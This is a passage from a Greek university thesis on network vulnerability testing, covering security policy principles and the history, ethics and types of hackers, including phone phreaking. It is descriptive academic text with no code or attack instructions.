της πολιτικής ασφάλειας και να υποστηρίζει ενεργά και με εμφανές τρόπο όλες τις

διαδικασίες για την εφαρμογή της πολιτικής. Η αντιμετώπιση του ζητήματος της

ασφάλειας των πληροφοριακών συστημάτων σε ανώτερο επίπεδο διοίκησης του

οργανισμού εξασφαλίζει ότι:

9 Κάτσικας Σ. – Γκρίτζαλης Δ – Γκρίτζαλης Σ., σελ. 399-402, 2004.

Page 34: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

34 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

− Αποδίδεται η αρμόζουσα σημασία στην ασφάλεια των πληροφοριακών συστημάτων

μέσα στον οργανισμό.

− Οι ενέργειες που αφορούν σε μέτρα ασφάλειας έχουν την υποστήριξη της διοίκησης

ώστε να γίνουν αποδεκτές από τους χρήστες.

− Εξασφαλίζονται οι απαραίτητοι πόροι για την υλοποίηση των ενεργειών που

αφορούν την διαχείριση της ασφάλειας στον οργανισμό.

− Η δέσμευση της διοίκησης στην επίτευξη του στόχου της ασφάλειας θα πρέπει να

είναι εμφανής σε όλα τα μέλη του οργανισμού.

• Συμβατότητα με την οργανωσιακή κουλτούρα: Η προσέγγιση που υιοθετεί η πολιτική

ασφάλειας και τα μέτρα προστασίας που προδιαγράφει θα πρέπει να είναι συνεπή μεταξύ

τους, να είναι συμβατά και με τα ιδιαίτερα χαρακτηριστικά (οργανωσιακή κουλτούρα)

και τις συνθήκες που υπάρχουν στον οργανισμό που θα εφαρμόσει την πολιτική αυτή.

Στην πράξη συμβαίνει συχνά, πολιτικές ασφάλειας και μέτρα προστασίας που έρχονται

σε αντίθεση με την κουλτούρα των μελών ενός οργανισμού, να μην εφαρμόζονται, ή να

εφαρμόζονται με τρόπο που τελικά μειώνει την ασφάλεια των πληροφοριακών

συστημάτων, αφού υπάρχει η λανθασμένη αντίληψη ότι τα μέτρα προστασίας

λειτουργούν όπως θα έπρεπε.

• Ενημέρωση και ευαισθητοποίηση των χρηστών σε ζητήματα ασφάλειας: Το σύνολο

των μελών του οργανισμού, διοικητικά στελέχη και υπάλληλοι, θα πρέπει να

αναγνωρίζουν και να συμμερίζονται τη σημασία της ασφάλεια των πληροφοριακών

συστημάτων. Αυτό μπορεί να επιτευχθεί με την ενημέρωση των χρηστών των

πληροφοριακών συστημάτων σε ζητήματα ασφάλειας, για παράδειγμα με την

παρακολούθηση ενημερωτικών σεμιναρίων.

• Εκπαίδευση και κατάρτιση: Οι χρήστες των πληροφοριακών συστημάτων εκτός από

ενημέρωση και ευαισθητοποίηση θα πρέπει να λάβουν και την αντίστοιχη εκπαίδευση

στην εφαρμογή της πολιτικής ασφάλειας και την εφαρμογή των μέτρων προστασίας,

ό πως για παράδειγμα η σωστή διαχείριση των συνθηματικών τους, η απο φυγή χρήσης

παράνομου λογισμικού, ο εντοπισμός περιστατικών παραβίασης της ασφάλειας και η

έγκαιρη ενημέρωση των υπευθύνων ασφάλειας για τα περιστατικά αυτά.

• Αξιολόγηση: Η εφαρμογή μιας πολιτικής ασφάλειας θα πρέπει να συνοδεύεται και από

ένα σύστημα για τη μέτρηση της αποτελεσματικότητας της πολιτικής ασφάλειας, την

αξιολόγησή της και την αξιοποίηση των ευρημάτων της αξιολόγησης για την

αναθεώρηση και βελτίωση της πολιτικής.

• Σταδιακή εφαρμογή: Συχνά οι οδηγίες και τα μέτρα ασφάλειας που περιλαμβάνονται σε

μια πολιτική ασφάλειας επιφέρουν αλλαγές στον τρόπο που οι χρήστες δρούσαν σε

συγκεκριμένες περιπτώσεις, ή ακόμα μπορεί να εισάγονται εντελώς νέες διαδικασίες και

Page 35: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

35 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ενέργειες που οι χρήστες θα πρέπει να υιοθετήσουν. Ανάλογα με το βαθμό της αλλαγής

που εισάγεται με την πολιτική ασφάλειας, επομένως, θα πρέπει να λαμβάνεται μέριμνα

για τη σταδιακή εφαρμογή της, όταν αυτό είναι δυνατό, ώστε να παρέχεται ο

απαιτούμενος χρόνος στους χρήστες των πληροφοριακών συστημάτων να εξοικειωθούν

με τους νέους ρόλους τους.

• Προσβασιμότητα – Διαθεσιμότητα: Η ευρεία χρήση των πληροφοριακών συστημάτων

σε πολλές από τις λειτουργίες των σύγχρονων επιχειρήσεων έχει ως αποτέλεσμα τα μέλη

των επιχειρήσεων να τα χρησιμοποιούν σε πολλές δραστηριότητές τους. Η πολιτική

ασφάλειας για τα πληροφοριακά συστήματα πρέπει να είναι καθολική, να αναφέρεται

δηλαδή σε όλα τα επιμέρους στοιχεία (αγαθά) που αποτελούν το πληροφοριακό σύστημα,

καθώς στην ασφάλεια ισχύει ο κανόνας του ‘ασθενέστερου κρίκου’. Προφανώς είναι

πολύ δύσκολο στην πράξη οι χρήστες να αναζητούν ώστε να συμβουλεύονται την

πολιτική ασφάλειας σε κάθε περίπτωση που οι ενέργειές τους αφορούν στοιχεία του

πληροφοριακού συστήματος. Επομένως, η πρόσβαση των χρηστών στην πολιτική

ασφάλειας θα πρέπει να διευκολύνεται κατά το δυνατόν (για παράδειγμα οι όροι χρήσης

και τα δικαιώματα και οι υποχρεώσεις των χρηστών των υπολογιστικών συστημάτων

ενός εκπαιδευτικού ή ερευνητικού εργαστηρίου μπορούν να είναι αναρτημένα σε εμφανή

σημεία στο χώρου του εργαστηρίου). Επίσης, θα πρέπει να εξασφαλιστεί η υποστήριξη

των χρηστών σε ζητήματα που αφορούν την εφαρμογή της πολιτικής ασφάλειας,

καθήκον που μπορεί να ανατεθεί στον υπεύθυνο ασφάλειας των πληροφοριακών

συστημάτων.

• Υπεύθυνος Ασφάλειας: Ο ρόλος του υπεύθυνου ή των υπευθύνων για την ασφάλεια που

καθορίζεται στην πολιτική ασφάλειας θα πρέπει να ανατίθεται σε ανθρώπους με γνώση,

κατάρτιση και εμπειρία σε ζητήματα ασφάλειας και προστασίας των πληροφοριακών

συστημάτων. Η αποτελεσματική εφαρμογή της πολιτικής ασφάλειας από τους χρήστες

των πληροφοριακών συστημάτων όμως, απαιτεί τη στενή συνεργασία μεταξύ των

χρηστών και των υπευθύνων ασφάλειας. Πολύ συχνά, λόγω του τεχνικού υποβάθρου των

υπευθύνων ασφάλειας και τον διαφορετικό προσανατολισμό των χρηστών των

πληροφοριακών συστημάτων, η επικοινωνία αυτή είναι δυσχερής, φανερώνοντας τις

αντιθέσεις στις διαφορετικές κουλτούρες που συνυπάρχουν μέσα στον ίδιο οργανισμό. Η

δυσχέρεια αυτή στην επικοινωνία (culture gap), που είναι συνήθης στους οργανισμούς

που έχουν πληροφοριακά συστήματα, θα πρέπει να καλυφθεί, καθώς η αποτελεσματική

εφαρμογή της πολιτικής ασφάλειας έχει μεγάλη σημασία για τον οργανισμό.

Page 36: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

36 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 2 Hacking και Hackers

2.1 Τι είναι Hacking Η λέξη Hacking είναι συνυφασμένη με την εξέλιξη της τεχνολογίας και τα κίνητρα των

Hackers. Αυτός είναι και ο λόγος για τις διάφορες, συχνά αντιφατικές, ερμηνείες του όρου.

Αρχικά, αναφέρονταν σε χρήστες υπολογιστικών συστημάτων οι οποίοι επιδίωκαν με πάθος

να διευρύνουν τις γνώσεις τους, ενώ ταυτόχρονα απολάμβαναν να εξερευνούν τις

δυνατότητες των υπολογιστών. Με την εξέλιξη όμως της τεχνολογίας και κυρίως με την

έκρηξη του Internet, ο όρος αποκτά αρνητική έννοια, γεγονός στο οποίο συμβάλλουν

καθοριστικά τα μέσα μαζικής ενημέρωσης, αφού συχνά αυτές οι γνώσεις χρησιμοποιούνται

για κακόβουλες ενέργειες.

Αν θέλουμε να δώσουμε έναν ορισμό, θα μπορούσαμε να πούμε ότι Hacking είναι η

προσπάθεια προσπέλασης ενός συστήματος υπολογιστή, χωρίς εξουσιοδότηση. Οι σκοποί

της μη εξουσιοδοτημένης πρόσβασης ποικίλουν και μπορούν να σχετίζονται είτε με τον

έλεγχο της ασφάλειας ενός πληροφοριακού συστήματος και την αντιμετώπιση των κενών

ασφάλειας τα οποία εντοπίζονται, είτε με την κλοπή και αλλοίωση δεδομένων, είτε με την

πολιτική ή κοινωνική ηλεκτρονική διαμαρτυρία, κυρίως σε περιόδους διεθνών κρίσεων.

2.2 Hackers Το φαινόμενο του Hacking και η ύπαρξη των Hackers είναι ιστορικά γνωστή εδώ και

τουλάχιστον τέσσερις δεκαετίες. Οι πράξεις τους, όταν βλέπουν το φως της δημοσιότητας,

συνοδεύονται κατά κανόνα από δημοσιεύματα των ΜΜΕ, τα οποία συσκοτίζουν ή

αποσιωπούν τα κίνητρα, τις πραγματικές διαστάσεις και τις συνέπειες του φαινομένου του

Hacking.

Hackers ονομάζονται τα άτομα που πραγματοποιούν προσπελάσεις σε υπολογιστικά

συστήματα χωρίς να έχουν εξουσιοδότηση από τους ιδιοκτήτες τους.

Page 37: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

37 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Πριν προχωρήσουμε όμως παρακάτω, αξίζει να κάνουμε μια ιστορική αναδρομή στο

φαινόμενο αυτό και να προσπαθήσουμε να σκιαγραφήσουμε το μορφότυπο των Hackers, να

προσεγγίσουμε την ιδεολογία τους και να κατανοήσουμε τα κίνητρά τους.

2.2.1 Ιστορικά στοιχεία Η δεκαετία του ’50 είναι αυτή που θα δώσει στον όρο Hacker την αυθεντική χροιά του και

μια επικού, ηρωικού τύπου διάσταση. Η έκφραση της δημιουργικότητας σε συνάρτηση με

την ανάδειξη της δεξιοτεχνίας προβάλλει συνυφασμένη με την εργασία στα υπολογιστικά

συστήματα. Οι εξειδικευμένοι προγραμματιστές, όπως όλοι οι καλοί δεξιοτέχνες, είχαν

γνώση και εις βάθος κατανόηση των συστημάτων με τα οποία δούλευαν10

.

Οι υπολογιστές ήταν μηχανήματα κλειδωμένα σε δωμάτια με ελεγχόμενη θερμοκρασία. Το

κόστος λειτουργίας τους ήταν απαγορευτικό και οι ερευνητές είχαν στη διάθεση τους

περιορισμένο χρόνο εργασίας. Τότε δημιουργήθηκαν τα πρώτα hacks, προγράμματα που

βοηθούσαν στη γρηγορότερη εκτέλεση υπολογισμών.

Αρκετές φορές τα hacks ήταν καλύτερα προγράμματα από τα αρχικά. Το 1969 δύο

υπάλληλοι της Βell συνέθεσαν κάποιες εντολές για να αυξήσουν την ταχύτητα των

υπολογιστών. Οι Dennis Ritchie και Ken Thompson ονόμασαν το λειτουργικό τους

σύστημα, UNIX.

Στα μέσα, ωστόσο, της δεκαετίας του ’60 η άμεση επαφή του ανεξάρτητου προγραμματιστή

και του συστήματός του μεταλλάσσεται ανεπιστρεπτί εξ’ αιτίας των τάσεων εξειδίκευσης

και τυποποίησης, τις οποίες επιβάλλουν οι νέες παραγωγικές γραμμές. Σε εργασιακό

επίπεδο, ο τεχνουργός υπολογιστών αποκόπτεται από τα παραγωγικά του μέσα, καθώς και

από την ικανοποίηση της άσκησης ολοκληρωτικού ελέγχου στα δημιουργήματά του.

Άμεση συνέπεια της κατασκευής του παραγωγικού μοντέλου, το οποίο προσδίδει κύρος στα

διοικητικά κυρίως στελέχη, είναι η μείωση της ποιότητας της εργασίας όσον αφορά τα

συστήματα των υπολογιστών, καθώς και η υποβάθμιση της κοινότητας των

προγραμματιστών. Ο όρος Hacking προσλαμβάνει ένα ακόμα ζωτικό του χαρακτηριστικό:

την τάση εναντίωσης προς την καθεστηκυία τάξη.11

10 Hannemyr G., “Technology and pleasure: Considering hacking constructive”, in FirstMonday Journal, Vol. 4, No. 2, 1999. 11 Hannemyr G., 1999.

Page 38: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

38 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Οι πρώτοι Hackers ήταν φοιτητές του Ινστιτούτου Τεχνολογίας της Μασαχουσέτης

(Massachusetts Institute of Technology - MIT), οι οποίοι από τη φυσική περιέργειά για τον

τρόπο λειτουργίας κάθε συσκευής που υπήρχε, κατασκεύασαν λεπτομερή σχέδια

τηλεφωνικών κυκλωμάτων. Ήταν στις αρχές της δεκαετίας του ’70, όπου ο John T. Draper

(γνωστός ως Captain Crunch), ανακάλυψε ότι, όταν παρήγαγε έναν τόνο ταυτόσημο με

αυτόν που χρησιμοποιούσε το τηλεφωνικό δίκτυο των Ηνωμένων Πολιτειών αποκτούσε

πρόσβαση σε δωρεάν τηλεφωνικές υπηρεσίες. Ο Draper και άλλα άτομα ανέπτυξαν τα

«blueboxes», γεννήτριες ηλεκτρονικών τόνων με τις οποίες θα μπορούσαν να αναπαράγουν

ολόκληρη την σειρά τόνων που χρησιμοποιούσε το τηλεφωνικό δίκτυο των Ηνωμένων

Πολιτειών στο σύστημα δρομολόγησης τηλεφωνημάτων του. Με τέτοιες συσκευές, ήταν

δυνατό να τηλεφωνήσεις οπουδήποτε στον κόσμο δωρεάν. Αυτή η μορφή Hacking

ονομάστηκε phreaking - ένα λογοπαίγνιο με τις λέξεις freak (φρικιό), phone (τηλέφωνο) και

free (δωρεάν).

Η ανατολή του ARPANET στις αρχές της δεκαετίας του ’70, η δημιουργία του πρώτου ΒΒS

(Bulletin Βoard System) το 1978, από τους Randy Sousa και Ward Christiansen, καθώς και

η ανάπτυξη του πρώτου προσωπικού υπολογιστή, το 1981 από την ΙΒΜ επιτρέπουν στους

Hackers να επικοινωνούν μεταξύ τους, ανταλλάσσοντας ιδέες, εμπειρίες και πρακτικές.

Η αλλαγή δεκαετίας βρίσκει τους Hackers οχυρωμένους σε διάφορα πανεπιστημιακά

ιδρύματα.12 Η συνένωση ομάδων, οι οποίες δρούσαν έως τότε περιθωριακά, και η

διεκδίκηση των δικαιωμάτων τους μέσω δυναμικών κινητοποιήσεων αποτελεί το βασικό

χαρακτηριστικό αυτής της έκρυθμης εποχής.13 Στο μεταίχμιο αυτής της αντιπαράθεσης, η

κοινότητα των Hackers συναινεί στην έμπρακτη απόρριψη της επιφανειακής ορθολογιστικής

σκέψης, μίας σκέψης που σχετίζεται πλέον απροκάλυπτα με τα συμφέροντα μίας

παγκόσμιας ολιγαρχίας. Οι χαρακτηριζόμενοι πλέον ως techno-hippies14 διακηρύσσουν την

ελευθερία της πληροφορίας,15

θέτοντας, κατ’ αυτόν τον τρόπο, τις θεμελιώδεις ακτιβιστικές

αρχές τους.

12 Κυρίως στο ΜΙΤ και το Standford τα οποία φημίζονται για την ανοχή τους καθώς και για κάποια μορφή αντι-κομφορμιστικής κουλτούρας. 13 Τα οικολογικά, αντιπολεμικά, φεμινιστικά και αντιρατσιστικά κινήματα πρωτοστατούν. 14 «Οι hackers έδρασαν ως αντινομιστές- “τεχνοχίπις”, υποστηρίζοντας τη χρήση των ΤΠΕ από όσο το δυνατόν περισσότερους πολίτες και συγκρούστηκαν με το Κράτος. Τότε, ήταν παράνομο για το κράτος να είναι hacker» (Γκρίτζαλη Δ., Ασφάλεια και Hacking στον Κυβερνοχώρο, Πανεπιστημιακές διαλέξεις, Αθήνα 2005). 15 Αυτό το οποίο χαρακτήριζε το δεύτερο κύμα των hackers ήταν το ότι ήθελαν απεγνωσμένα υπολογιστές και υπολογιστικά συστήματα σχεδιασμένα ώστε να είναι χρήσιμα και να δίνουν πρόσβαση στους πολίτες. (Hannemyr, 1999).

Page 39: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

39 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Οι ορισμοί Hacker και Hacking μετασχηματίζονται καθώς εγκαθιδρύεται το διαδίκτυο16

που

προβάλλει ως διασυνδετικό μέσο ανταλλαγής της πληροφορίας. Οι καταιγιστικές αλλαγές

μίας επικοινωνίας, η οποία δεν οριοθετείται βάσει εντοπιότητας και λοιπών περιοριστικών

χωρικών παραγόντων, προσδίδουν τα κατάλληλα εργαλεία για την επίτευξη των στόχων της

κοινότητας. Η διεύρυνση, ωστόσο, ομάδων και μέσων δίνει τη δυνατότητα στην ανάδειξη

στοιχείων μίας υπόγειας κουλτούρας, στοιχεία τα οποία τείνουν να ενσωματωθούν στους

κόλπους των Hackers.

Στα τέλη της δεκαετίας το υ ’80 και καθ’ όλη τη διάρκεια της δεκαετίας το υ ’90 , ο ι

παραπάνω ορισμοί εμπλέκονται όλο και περισσότερο με πράξεις αντινομίας.17

Παράλληλα

με τον όρο Hacker ακούγεται και το computer criminal, χαρακτηρισμός ο οποίος θα

προσλάβει διαστάσεις υστερίας έπειτα από την 11η Σεπτεμβρίου 2001.

2.2.2 Hackers: Ιδεολογία – Κουλτούρα – Κίνητρα

Ανεξάρτητα από τις παραλλαγές, το μύθο, τις υπερβολικές και, επί των πλείστων,

ανακριβείς αναφορές των ΜΜΕ, ο ηθικός κώδικας του Hacking εμμένει στις βασικές του

αρχές. Αν και ευπροσάρμοστος στις τεχνολογικές καινοτομίες και τις κοινωνικοπολιτικές

μετεξελίξεις, οριοθετεί την ιδεολογία την οποία θα πρέπει να ασπαστεί εξ ολοκλήρου ένας

εν δυνάμει Hacker.

Τα βασικά σημεία της ηθικής και της ιδεολογίας του Hacker μπορούν να συνοψιστούν ως

εξής:

• Απόρριψη κάθε ιεραρχίας18

Η κοινότητα των Hackers σέβεται και αποδίδει τιμή στους έμπειρους – σοφούς της, δεν

αναγνωρίζει ωστόσο αρχηγούς.

- Προώθηση της αποκεντροποίησης

• Αντίσταση σε κάθε μορφή εξουσίας

Οι Hackers δεν εμπιστεύονται και προβάλλουν σθεναρή αντίσταση σε οποιοδήποτε

εξουσιαστικό κέντρο (κρατικό, επιχειρηματικό, κλπ) το οποίο προωθεί τη λογοκρισία και

αντιτίθεται στην εθελοντική συνεργασία και τη συνοχή του ομαδικού πνεύματος.19

• Διαμοιρασμός της πληροφορίας

16 Οι hackers συνέβαλαν ουσιαστικά στο κτίσιμο του Internet το οποίο αποτελεί μετεξέλιξη του ARPANET (Hannemyr, 1999). 17 Vegh S., “Hacktivists or Cyberterrorists? The changing media discourse on hacking”, in First Monday Journal, Vol. 7, No. 10, 2002. 18 Η ανέλιξη δε θεωρείται σημαντική, αντίθετα, η απόδοση σεβασμού στους «δασκάλους» του χώρου κρίνεται αναγκαία όπως και απαραίτητη συνθήκη για μία πετυχημένη εξελικτική πορεία εντός των πλαισίων της κοινότητας. 19 Hannemyr, 1999.

Page 40: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

40 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Η πληροφορία, με την ευρεία της έννοια, οφείλει να διακινείται ελεύθερα. Ένας από τους

πλέον ουσιώδεις άγραφους νόμους του Hacking περικλείει τα παρακάτω: Υπάρχει μία

συνεχόμενη ηθική στην κοινότητα να δίνεις πίσω στο διαδίκτυο αυτό που σου έχει δώσει

κι εκείνο.20

Το παραπάνω ιδεολογικό μανιφέστο στηρίζεται στις εξής δηλωτικές θέσεις:

Η χαρά της δημιουργίας δεν επέρχεται μόνο με το αποτέλεσμα αλλά και με τη διαδικασία

επίτευξής του.

Η εξάσκηση υπερέχει της θεωρίας.

Οι Hackers θα πρέπει να κρίνονται μόνο από τα προσόντα τους και το έργο τους, όχι από

τη θέση, την ηλικία, την εμφάνισή τους κλπ.

Η δημιουργία τέχνης και ομορφιάς είναι εφικτή μέσω ενός υπολογιστή.

Ο καθένας ο οποίος πληροί τις βασικές αυτές προϋποθέσεις μπορεί να εισέλθει στον κόσμο

του Hacking. Πρόκειται για έναν κόσμο μέσα στον οποίο προβάλλει έντονα η εικόνα ενός

ευφυούς εργασιομανούς ατόμου με εμμονή στην τεχνολογία. Είναι πιθανό η άποψη των

Hackers: «Η τεχνολογία για την τεχνολογία» να φαντάζει, στην εποχή του άκρατου

πλουτισμού, τουλάχιστον ουτοπική, ωστόσο αποτελεί την κινητήριο δύναμη επάνω στην

οποία βασίζεται η επιβίωση και η εξέλιξη της κοινότητας.

Η επίλυση δύσκολων προβλημάτων προκαλεί τον ευφυή νου ενόσω τον απομακρύνει από

οποιαδήποτε μορφή ανίας και αγγαρείας. Η δημιουργικότητα σε συνάρτηση με την

παραγωγικότητα αποδίδει ικανοποίηση στον Hacker, παράλληλα, αποτελεί σημείο

εκκίνησης για περαιτέρω ψηφιακές εξερευνήσεις στις οποίες δεν ενδείκνυται η επίλυση του

ίδιου προβλήματος, έστω και με διαφορετικό τρόπο.

Επιπρόσθετα, ένας συγκεκριμένος τρόπος συμπεριφοράς εκτός ψηφιακών ορίων (από το

ντύσιμο έως τις διατροφικές συνήθειες) δε στοιχειοθετείται – παρά μόνο στην κατασκευή

ενός συγκεκριμένου Hacker-μορφότυπου υπό το πρίσμα της δημοσιογραφικής οπτικής και

της κινηματογραφικής φιλολογίας. Ομοίως, θα πρέπει να απορριφθεί η εντύπωση πως ο

Hacker είναι ο high-tech τύπος που ανανεώνει το υπολογιστικό του σύστημα με οτιδήποτε

καινούργιο (και ακριβό) επιβάλλουν τα καπιταλιστικού τύπου εμπορικά σκευάσματα.

Η κοινότητα αυτή, σε πολλές περιπτώσεις κατασκευάζει τα δικά της μηχανήματα με μεράκι

και αφοσίωση, καθιερώνοντας την ελαστικότητα, την προσαρμοστικότητα, τη δυνατότητα

20 Raymond E. S., «Πώς να γίνεις Hacker», http://earthlab.uoi.gr/indy/hacker-howto-gr/

Page 41: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

41 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

συναρμολόγησης και εντέλει έναν ανοιχτό κώδικα για τους επόμενους συνεργάτες και συν-

εργαζόμενους.21 Η Hacking φιλοσοφία απορρίπτει και, στη συνέχεια, αντιτάσσεται σε κάθε

άκαμπτο και στείρο φορμαλισμό. Η κοινότητα των Hackers δημιουργεί ένα κράμα ατομικής

υπέρβασης και συνεργατικής αμοιβαιότητας.22

Η απουσία αυστηρής οριοθέτησης καθιστά την κοινότητα ευάλωτη σε οποιαδήποτε

κακόβουλη κίνηση που θα εξυπηρετήσει συμφέροντα ομάδων και οργανισμών. Μέσα στα

πλαίσια μίας τέτοιου τύπου επιχείρησης εκμετάλλευσης, ο διαχωρισμός του όρου Hacker

από τον όρο Cracker προβάλλει επιτακτικός καθώς, όπως αναφέρει και ο Raymond: «οι

Hackers κτίζουν πράγματα, οι Crackers τα σπάνε».23

Ένα άλλο κεφάλαιο το οποίο τείνει να προκαλεί σύγχυση στο χώρο24 σχετίζεται με την

ασάφεια των ορίων μεταξύ του Hacktivist25 και του Cyberterrorist.26 Τα κυβερνητικά

επιτελεία σε συντονισμό, τις περισσότερες φορές, με τα ΜΜΕ επικροτούν την παραπάνω

παρερμηνεία του όρου Hacker, αφενός για την εύκολη θεσμοθέτηση μίας νομοθεσίας που

εξυπηρετεί την τρομολαγνεία, αφετέρου την άνοδο της ακροαματικότητας και της

κυκλοφορίας του περιοδικού τύπου.27

2.2.3 Τύποι των Hackers Το Hacking είναι συναρτήσει των γνώσεων και του χρόνου. Οι γνώσεις για να αποκτηθούν

απαιτούν χρόνο. Χρόνος όμως απαιτείται για να επιτευχθεί και μια επιτυχημένη εισβολή.

Εξαιτίας αυτού μπορούμε να διακρίνουμε δύο τύπους σοβαρών Hackers: οι

υποαπασχολούμενοι και αυτοί που πληρώνονται προκειμένου να πραγματοποιούν εισβολές.

Οι Hackers μπορούν να ταξινομηθούν στις παρακάτω κατηγορίες:

Ειδικοί Ασφάλειας (Security Experts):

21 Hannemyr, 1999. 22 Οι κανόνες υφίστανται, ο hacker, ωστόσο, δεν εξαναγκάζεται στο ελάχιστο ούτε να τους ακολουθήσει, ούτε να υπακούσει στην ομάδα του. 23 Raymond E. S., «Πώς να γίνεις Hacker», http://earthlab.uoi.gr/indy/hacker-howto-gr/ 24 Denning D., Activism, Hacktivism and Cyber-terrorism: The Internet as a tool for influencing Foreign Policy, Georgetown University, USA 1999. 25 Αφορά την σύμπραξη ακτιβισμού και Hacking περικλείοντας ενέργειες που δε σκοπεύουν να επιφέρουν ζημιά σε έμψυχο και άψυχο υλικό, αλλά με την διακοπή της κανονικής λειτουργίας κάποιου site να επιστήσουν την προσοχή σε κάποιο κοινωνικοπολιτικό ζήτημα 26 Καλύπτει επιθέσεις ψηφιακού τύπου οι οποίες γίνονται για να προκαλέσουν απώλειες ανθρώπινης ζωής καθώς και μεγάλη οικονομική ζημιά με σκοπό να επιβάλλουν αιτήματα κυρίως πολιτικής και οικονομικής φύσης. 27 Vegh, 2002.

Page 42: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

42 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Όσοι είναι ειδικοί ασφάλειας έχουν την τεχνογνωσία να κάνουν εισβολές, αλλά δεν το

κάνουν για ηθικούς ή για οικονομικούς λόγους. Συνήθως εργάζονται σε εταιρείες οι οποίες

πραγματοποιούν ελέγχους ασφάλειας για λογαριασμό πελατών τους, παρακολουθούν τις

τεχνικές των Hackers, ανακαλύπτουν νέες τεχνικές εισβολής και συχνά αναπτύσσουν

λογισμικό για την ενίσχυση της ασφάλειας των πληροφοριακών συστημάτων.

Script Kiddies:

Οι script kiddies είναι συνήθως σπουδαστές σε κάποια βαθμίδα της εκπαίδευσης (γυμνάσιο,

λύκειο ή πανεπιστήμιο), οι οποίοι χρησιμοποιώντας πολλές φορές τους υπολογιστικούς

